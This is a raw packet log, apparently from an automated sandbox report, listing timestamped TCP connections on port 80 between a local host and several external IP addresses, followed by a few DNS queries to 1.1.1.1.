                                  May 23, 2024 15:21:04.119369030 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.146579981 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.147507906 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.148248911 CEST4974080192.168.2.687.236.16.214
                                  May 23, 2024 15:21:05.149630070 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.151870966 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.151881933 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.151896954 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.151956081 CEST4974080192.168.2.687.236.16.214
                                  May 23, 2024 15:21:05.151956081 CEST4974080192.168.2.687.236.16.214
                                  May 23, 2024 15:21:05.156491041 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.158360958 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.158432007 CEST4974080192.168.2.687.236.16.214
                                  May 23, 2024 15:21:05.160121918 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.160130978 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.160142899 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.160207987 CEST4974080192.168.2.687.236.16.214
                                  May 23, 2024 15:21:05.163533926 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.163661957 CEST4974080192.168.2.687.236.16.214
                                  May 23, 2024 15:21:05.211277008 CEST804974087.236.16.214192.168.2.6
                                  May 23, 2024 15:21:05.211675882 CEST4974080192.168.2.687.236.16.214
                                  May 23, 2024 15:21:05.529515028 CEST4974080192.168.2.687.236.16.214
                                  May 23, 2024 15:21:06.551584959 CEST4974180192.168.2.687.236.16.214
                                  May 23, 2024 15:21:06.556760073 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:06.559727907 CEST4974180192.168.2.687.236.16.214
                                  May 23, 2024 15:21:06.563597918 CEST4974180192.168.2.687.236.16.214
                                  May 23, 2024 15:21:06.568643093 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:06.615406036 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.644262075 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.644926071 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.646743059 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.646754980 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.646764994 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.646765947 CEST4974180192.168.2.687.236.16.214
                                  May 23, 2024 15:21:07.646862984 CEST4974180192.168.2.687.236.16.214
                                  May 23, 2024 15:21:07.650397062 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.650432110 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.650542021 CEST4974180192.168.2.687.236.16.214
                                  May 23, 2024 15:21:07.654035091 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.654047966 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.654128075 CEST4974180192.168.2.687.236.16.214
                                  May 23, 2024 15:21:07.657695055 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.657706976 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.657718897 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.657800913 CEST4974180192.168.2.687.236.16.214
                                  May 23, 2024 15:21:07.657800913 CEST4974180192.168.2.687.236.16.214
                                  May 23, 2024 15:21:07.692039967 CEST804974187.236.16.214192.168.2.6
                                  May 23, 2024 15:21:07.692137003 CEST4974180192.168.2.687.236.16.214
                                  May 23, 2024 15:21:08.076585054 CEST4974180192.168.2.687.236.16.214
                                  May 23, 2024 15:21:09.094419003 CEST4974280192.168.2.687.236.16.214
                                  May 23, 2024 15:21:09.101615906 CEST804974287.236.16.214192.168.2.6
                                  May 23, 2024 15:21:09.101725101 CEST4974280192.168.2.687.236.16.214
                                  May 23, 2024 15:21:09.103352070 CEST4974280192.168.2.687.236.16.214
                                  May 23, 2024 15:21:09.158382893 CEST804974287.236.16.214192.168.2.6
                                  May 23, 2024 15:21:10.668983936 CEST804974287.236.16.214192.168.2.6
                                  May 23, 2024 15:21:10.673681021 CEST804974287.236.16.214192.168.2.6
                                  May 23, 2024 15:21:10.673763990 CEST4974280192.168.2.687.236.16.214
                                  May 23, 2024 15:21:10.674691916 CEST4974280192.168.2.687.236.16.214
                                  May 23, 2024 15:21:10.725004911 CEST804974287.236.16.214192.168.2.6
                                  May 23, 2024 15:21:15.737406969 CEST4974380192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:15.748049021 CEST8049743188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:15.748123884 CEST4974380192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:15.750020027 CEST4974380192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:15.757812023 CEST8049743188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:17.263838053 CEST4974380192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:17.269745111 CEST8049743188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:17.269908905 CEST4974380192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:18.282290936 CEST4974480192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:18.287420034 CEST8049744188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:18.287499905 CEST4974480192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:18.289376974 CEST4974480192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:18.341449022 CEST8049744188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:19.794919968 CEST4974480192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:19.800726891 CEST8049744188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:19.800856113 CEST4974480192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:20.815623999 CEST4974580192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:20.820769072 CEST8049745188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:20.820883036 CEST4974580192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:20.823626041 CEST4974580192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:20.828850031 CEST8049745188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:20.875571012 CEST8049745188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:22.326150894 CEST4974580192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:22.333704948 CEST8049745188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:22.333759069 CEST4974580192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:23.344556093 CEST4974680192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:23.349739075 CEST8049746188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:23.351728916 CEST4974680192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:23.355711937 CEST4974680192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:23.404870987 CEST8049746188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:25.013010025 CEST8049746188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:25.017741919 CEST8049746188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:25.019820929 CEST4974680192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:25.021030903 CEST4974680192.168.2.6188.114.96.3
                                  May 23, 2024 15:21:25.076888084 CEST8049746188.114.96.3192.168.2.6
                                  May 23, 2024 15:21:30.220215082 CEST4974780192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:30.225187063 CEST8049747194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:30.225260973 CEST4974780192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:30.227165937 CEST4974780192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:30.276937962 CEST8049747194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:30.924962044 CEST8049747194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:30.931269884 CEST8049747194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:30.934354067 CEST4974780192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:31.732403040 CEST4974780192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:32.750935078 CEST4974880192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:32.759689093 CEST8049748194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:32.763834000 CEST4974880192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:32.767630100 CEST4974880192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:32.824800014 CEST8049748194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:33.475075960 CEST8049748194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:33.526933908 CEST8049748194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:33.526957035 CEST8049748194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:33.527223110 CEST4974880192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:34.279439926 CEST4974880192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:35.297930956 CEST4974980192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:35.375359058 CEST8049749194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:35.378506899 CEST4974980192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:35.383677959 CEST4974980192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:35.388906002 CEST8049749194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:35.436543941 CEST8049749194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:36.066885948 CEST8049749194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:36.071671009 CEST8049749194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:36.071995020 CEST4974980192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:36.890065908 CEST4974980192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:37.907627106 CEST4975080192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:37.913099051 CEST8049750194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:37.913630009 CEST4975080192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:37.915666103 CEST4975080192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:37.968492031 CEST8049750194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:38.712148905 CEST8049750194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:38.717519045 CEST8049750194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:38.719877005 CEST4975080192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:38.723648071 CEST4975080192.168.2.6194.58.112.174
                                  May 23, 2024 15:21:38.779093981 CEST8049750194.58.112.174192.168.2.6
                                  May 23, 2024 15:21:43.946423054 CEST4975180192.168.2.65.101.153.149
                                  May 23, 2024 15:21:43.951916933 CEST80497515.101.153.149192.168.2.6
                                  May 23, 2024 15:21:43.952001095 CEST4975180192.168.2.65.101.153.149
                                  May 23, 2024 15:21:43.953802109 CEST4975180192.168.2.65.101.153.149
                                  May 23, 2024 15:21:44.009502888 CEST80497515.101.153.149192.168.2.6
                                  May 23, 2024 15:21:44.697736979 CEST80497515.101.153.149192.168.2.6
                                  May 23, 2024 15:21:44.702784061 CEST80497515.101.153.149192.168.2.6
                                  May 23, 2024 15:21:44.706698895 CEST4975180192.168.2.65.101.153.149
                                  May 23, 2024 15:21:46.476279974 CEST4975180192.168.2.65.101.153.149
                                  May 23, 2024 15:21:47.485529900 CEST4975280192.168.2.65.101.153.149
                                  May 23, 2024 15:21:47.490490913 CEST80497525.101.153.149192.168.2.6
                                  May 23, 2024 15:21:47.490564108 CEST4975280192.168.2.65.101.153.149
                                  May 23, 2024 15:21:47.492356062 CEST4975280192.168.2.65.101.153.149
                                  May 23, 2024 15:21:47.540918112 CEST80497525.101.153.149192.168.2.6
                                  May 23, 2024 15:21:48.243093967 CEST80497525.101.153.149192.168.2.6
                                  May 23, 2024 15:21:48.247819901 CEST80497525.101.153.149192.168.2.6
                                  May 23, 2024 15:21:48.248980045 CEST4975280192.168.2.65.101.153.149
                                  May 23, 2024 15:21:48.998099089 CEST4975280192.168.2.65.101.153.149
                                  May 23, 2024 15:21:50.017710924 CEST4975380192.168.2.65.101.153.149
                                  May 23, 2024 15:21:50.022763014 CEST80497535.101.153.149192.168.2.6
                                  May 23, 2024 15:21:50.022864103 CEST4975380192.168.2.65.101.153.149
                                  May 23, 2024 15:21:50.024755001 CEST4975380192.168.2.65.101.153.149
                                  May 23, 2024 15:21:50.030036926 CEST80497535.101.153.149192.168.2.6
                                  May 23, 2024 15:21:50.075437069 CEST80497535.101.153.149192.168.2.6
                                  May 23, 2024 15:21:50.764741898 CEST80497535.101.153.149192.168.2.6
                                  May 23, 2024 15:21:50.773209095 CEST80497535.101.153.149192.168.2.6
                                  May 23, 2024 15:21:50.773263931 CEST4975380192.168.2.65.101.153.149
                                  May 23, 2024 15:21:51.529545069 CEST4975380192.168.2.65.101.153.149
                                  May 23, 2024 15:21:52.549390078 CEST4975480192.168.2.65.101.153.149
                                  May 23, 2024 15:21:52.557228088 CEST80497545.101.153.149192.168.2.6
                                  May 23, 2024 15:21:52.557360888 CEST4975480192.168.2.65.101.153.149
                                  May 23, 2024 15:21:52.561395884 CEST4975480192.168.2.65.101.153.149
                                  May 23, 2024 15:21:52.609430075 CEST80497545.101.153.149192.168.2.6
                                  May 23, 2024 15:21:53.305222988 CEST80497545.101.153.149192.168.2.6
                                  May 23, 2024 15:21:53.310044050 CEST80497545.101.153.149192.168.2.6
                                  May 23, 2024 15:21:53.310139894 CEST4975480192.168.2.65.101.153.149
                                  May 23, 2024 15:21:53.311002016 CEST4975480192.168.2.65.101.153.149
                                  May 23, 2024 15:21:53.361002922 CEST80497545.101.153.149192.168.2.6
                                  May 23, 2024 15:21:58.460815907 CEST4975580192.168.2.692.118.24.161
                                  May 23, 2024 15:21:58.465908051 CEST804975592.118.24.161192.168.2.6
                                  May 23, 2024 15:21:58.467799902 CEST4975580192.168.2.692.118.24.161
                                  May 23, 2024 15:21:58.470715046 CEST4975580192.168.2.692.118.24.161
                                  May 23, 2024 15:21:58.521138906 CEST804975592.118.24.161192.168.2.6
                                  May 23, 2024 15:21:59.138900042 CEST804975592.118.24.161192.168.2.6
                                  May 23, 2024 15:21:59.143527985 CEST804975592.118.24.161192.168.2.6
                                  May 23, 2024 15:21:59.143745899 CEST4975580192.168.2.692.118.24.161
                                  May 23, 2024 15:21:59.983840942 CEST4975580192.168.2.692.118.24.161
                                  May 23, 2024 15:22:01.000965118 CEST4975680192.168.2.692.118.24.161
                                  May 23, 2024 15:22:01.006561995 CEST804975692.118.24.161192.168.2.6
                                  May 23, 2024 15:22:01.006643057 CEST4975680192.168.2.692.118.24.161
                                  May 23, 2024 15:22:01.008996964 CEST4975680192.168.2.692.118.24.161
                                  May 23, 2024 15:22:01.061216116 CEST804975692.118.24.161192.168.2.6
                                  May 23, 2024 15:22:01.681588888 CEST804975692.118.24.161192.168.2.6
                                  May 23, 2024 15:22:01.686403036 CEST804975692.118.24.161192.168.2.6
                                  May 23, 2024 15:22:01.686460972 CEST4975680192.168.2.692.118.24.161
                                  May 23, 2024 15:22:02.515701056 CEST4975680192.168.2.692.118.24.161
                                  May 23, 2024 15:22:03.533046961 CEST4975780192.168.2.692.118.24.161
                                  May 23, 2024 15:22:03.538033009 CEST804975792.118.24.161192.168.2.6
                                  May 23, 2024 15:22:03.538095951 CEST4975780192.168.2.692.118.24.161
                                  May 23, 2024 15:22:03.539709091 CEST4975780192.168.2.692.118.24.161
                                  May 23, 2024 15:22:03.544627905 CEST804975792.118.24.161192.168.2.6
                                  May 23, 2024 15:22:03.597951889 CEST804975792.118.24.161192.168.2.6
                                  May 23, 2024 15:22:04.313246965 CEST804975792.118.24.161192.168.2.6
                                  May 23, 2024 15:22:04.317903996 CEST804975792.118.24.161192.168.2.6
                                  May 23, 2024 15:22:04.319752932 CEST4975780192.168.2.692.118.24.161
                                  May 23, 2024 15:22:05.045030117 CEST4975780192.168.2.692.118.24.161
                                  May 23, 2024 15:22:06.063711882 CEST4975880192.168.2.692.118.24.161
                                  May 23, 2024 15:22:06.069087982 CEST804975892.118.24.161192.168.2.6
                                  May 23, 2024 15:22:06.069178104 CEST4975880192.168.2.692.118.24.161
                                  May 23, 2024 15:22:06.071713924 CEST4975880192.168.2.692.118.24.161
                                  May 23, 2024 15:22:06.121407986 CEST804975892.118.24.161192.168.2.6
                                  May 23, 2024 15:22:06.743333101 CEST804975892.118.24.161192.168.2.6
                                  May 23, 2024 15:22:06.749661922 CEST804975892.118.24.161192.168.2.6
                                  May 23, 2024 15:22:06.749742985 CEST4975880192.168.2.692.118.24.161
                                  May 23, 2024 15:22:06.750730038 CEST4975880192.168.2.692.118.24.161
                                  May 23, 2024 15:22:06.801163912 CEST804975892.118.24.161192.168.2.6
                                  May 23, 2024 15:22:11.822333097 CEST4975980192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:11.827538967 CEST8049759212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:11.829437971 CEST4975980192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:11.829591036 CEST4975980192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:11.881078959 CEST8049759212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:12.477113962 CEST8049759212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:12.481829882 CEST8049759212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:12.483724117 CEST4975980192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:13.341978073 CEST4975980192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:14.361088037 CEST4976080192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:14.366133928 CEST8049760212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:14.367846966 CEST4976080192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:14.369345903 CEST4976080192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:14.422383070 CEST8049760212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:15.010584116 CEST8049760212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:15.015347004 CEST8049760212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:15.015403986 CEST4976080192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:15.873735905 CEST4976080192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:16.892323971 CEST4976180192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:16.898130894 CEST8049761212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:16.898212910 CEST4976180192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:16.900433064 CEST4976180192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:16.905548096 CEST8049761212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:16.956243992 CEST8049761212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:17.539033890 CEST8049761212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:17.543870926 CEST8049761212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:17.543951035 CEST4976180192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:19.368113995 CEST4976180192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:20.375583887 CEST4976280192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:20.380669117 CEST8049762212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:20.380736113 CEST4976280192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:20.382287025 CEST4976280192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:20.434606075 CEST8049762212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:21.060877085 CEST8049762212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:21.065676928 CEST8049762212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:21.065947056 CEST4976280192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:21.066605091 CEST4976280192.168.2.6212.227.172.253
                                  May 23, 2024 15:22:21.117137909 CEST8049762212.227.172.253192.168.2.6
                                  May 23, 2024 15:22:26.101608992 CEST4976380192.168.2.63.33.130.190
                                  May 23, 2024 15:22:26.116686106 CEST80497633.33.130.190192.168.2.6
                                  May 23, 2024 15:22:26.116871119 CEST4976380192.168.2.63.33.130.190
                                  May 23, 2024 15:22:26.119154930 CEST4976380192.168.2.63.33.130.190
                                  May 23, 2024 15:22:26.187675953 CEST80497633.33.130.190192.168.2.6
                                  May 23, 2024 15:22:26.582159996 CEST80497633.33.130.190192.168.2.6
                                  May 23, 2024 15:22:26.582367897 CEST4976380192.168.2.63.33.130.190
                                  May 23, 2024 15:22:28.701569080 CEST4976380192.168.2.63.33.130.190
                                  May 23, 2024 15:22:28.706702948 CEST80497633.33.130.190192.168.2.6
                                  May 23, 2024 15:22:29.719037056 CEST4976480192.168.2.63.33.130.190
                                  May 23, 2024 15:22:29.724267006 CEST80497643.33.130.190192.168.2.6
                                  May 23, 2024 15:22:29.724354982 CEST4976480192.168.2.63.33.130.190
                                  May 23, 2024 15:22:29.725642920 CEST4976480192.168.2.63.33.130.190
                                  May 23, 2024 15:22:29.781203032 CEST80497643.33.130.190192.168.2.6
                                  May 23, 2024 15:22:30.197575092 CEST80497643.33.130.190192.168.2.6
                                  May 23, 2024 15:22:30.197714090 CEST4976480192.168.2.63.33.130.190
                                  May 23, 2024 15:22:31.232693911 CEST4976480192.168.2.63.33.130.190
                                  May 23, 2024 15:22:31.237871885 CEST80497643.33.130.190192.168.2.6
                                  May 23, 2024 15:22:32.251780033 CEST4976580192.168.2.63.33.130.190
                                  May 23, 2024 15:22:32.257201910 CEST80497653.33.130.190192.168.2.6
                                  May 23, 2024 15:22:32.258635044 CEST4976580192.168.2.63.33.130.190
                                  May 23, 2024 15:22:32.260241985 CEST4976580192.168.2.63.33.130.190
                                  May 23, 2024 15:22:32.265650034 CEST80497653.33.130.190192.168.2.6
                                  May 23, 2024 15:22:32.315459967 CEST80497653.33.130.190192.168.2.6
                                  May 23, 2024 15:22:32.727677107 CEST80497653.33.130.190192.168.2.6
                                  May 23, 2024 15:22:32.731897116 CEST4976580192.168.2.63.33.130.190
                                  May 23, 2024 15:22:33.763952971 CEST4976580192.168.2.63.33.130.190
                                  May 23, 2024 15:22:33.772507906 CEST80497653.33.130.190192.168.2.6
                                  May 23, 2024 15:22:34.782387972 CEST4976680192.168.2.63.33.130.190
                                  May 23, 2024 15:22:34.787571907 CEST80497663.33.130.190192.168.2.6
                                  May 23, 2024 15:22:34.787683010 CEST4976680192.168.2.63.33.130.190
                                  May 23, 2024 15:22:34.789547920 CEST4976680192.168.2.63.33.130.190
                                  May 23, 2024 15:22:34.841414928 CEST80497663.33.130.190192.168.2.6
                                  May 23, 2024 15:22:35.285506964 CEST80497663.33.130.190192.168.2.6
                                  May 23, 2024 15:22:35.290215015 CEST80497663.33.130.190192.168.2.6
                                  May 23, 2024 15:22:35.290378094 CEST4976680192.168.2.63.33.130.190
                                  May 23, 2024 15:22:35.291126013 CEST4976680192.168.2.63.33.130.190
                                  May 23, 2024 15:22:35.349839926 CEST80497663.33.130.190192.168.2.6
                                  May 23, 2024 15:22:43.345951080 CEST4976780192.168.2.669.57.162.24
                                  May 23, 2024 15:22:43.351113081 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:43.351246119 CEST4976780192.168.2.669.57.162.24
                                  May 23, 2024 15:22:43.353050947 CEST4976780192.168.2.669.57.162.24
                                  May 23, 2024 15:22:43.401112080 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:43.935703039 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:43.940427065 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:43.940444946 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:43.940608978 CEST4976780192.168.2.669.57.162.24
                                  May 23, 2024 15:22:43.945804119 CEST4976780192.168.2.669.57.162.24
                                  May 23, 2024 15:22:43.993128061 CEST804976769.57.162.24192.168.2.6
                                  May 23, 2024 15:22:48.955769062 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:48.961035967 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:48.961148977 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:48.963737965 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:49.013346910 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.568794012 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.570089102 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.570168972 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:49.573481083 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.573517084 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.573549032 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.573573112 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:49.573611975 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:49.619541883 CEST8049768162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:49.619648933 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:50.467087984 CEST4976880192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:51.485528946 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:51.491693020 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:51.491780043 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:51.493680954 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:51.549731016 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.053009033 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.054665089 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.054717064 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:52.058073997 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.058090925 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.058105946 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.058146954 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:52.058199883 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:52.103465080 CEST8049769162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:52.103533030 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:52.998280048 CEST4976980192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:54.017860889 CEST4977080192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:54.023099899 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.023611069 CEST4977080192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:54.025618076 CEST4977080192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:54.038835049 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.087321997 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.593547106 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.594374895 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.594573021 CEST4977080192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:54.598418951 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.598424911 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.598436117 CEST8049770162.240.81.18192.168.2.6
                                  May 23, 2024 15:22:54.598504066 CEST4977080192.168.2.6162.240.81.18
                                  May 23, 2024 15:22:55.529577017 CEST4977080192.168.2.6162.240.81.18

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 23, 2024 15:18:49.648089886 CEST5334853192.168.2.61.1.1.1
                                  May 23, 2024 15:18:49.668534040 CEST53533481.1.1.1192.168.2.6
                                  May 23, 2024 15:19:05.345263958 CEST5917653192.168.2.61.1.1.1
                                  May 23, 2024 15:19:05.824011087 CEST53591761.1.1.1192.168.2.6
                                  May 23, 2024 15:19:19.329221964 CEST5227853192.168.2.61.1.1.1
                                  May 23, 2024 15:19:19.616153002 CEST53522781.1.1.1192.168.2.6
                                  May 23, 2024 15:19:32.751833916 CEST6298453192.168.2.61.1.1.1
                                  May 23, 2024 15:19:32.763287067 CEST53629841.1.1.1192.168.2.6
                                  May 23, 2024 15:19:46.276344061 CEST5166353192.168.2.61.1.1.1
                                  May 23, 2024 15:19:46.303020954 CEST53516631.1.1.1192.168.2.6
                                  May 23, 2024 15:19:59.658524990 CEST5516853192.168.2.61.1.1.1
                                  May 23, 2024 15:19:59.936491013 CEST53551681.1.1.1192.168.2.6
                                  May 23, 2024 15:20:14.599570036 CEST6306053192.168.2.61.1.1.1
                                  May 23, 2024 15:20:14.631174088 CEST53630601.1.1.1192.168.2.6
                                  May 23, 2024 15:20:29.361541033 CEST5363553192.168.2.61.1.1.1
                                  May 23, 2024 15:20:29.386336088 CEST53536351.1.1.1192.168.2.6
                                  May 23, 2024 15:20:42.785188913 CEST6527853192.168.2.61.1.1.1
                                  May 23, 2024 15:20:42.859942913 CEST53652781.1.1.1192.168.2.6
                                  May 23, 2024 15:21:01.188491106 CEST4961153192.168.2.61.1.1.1
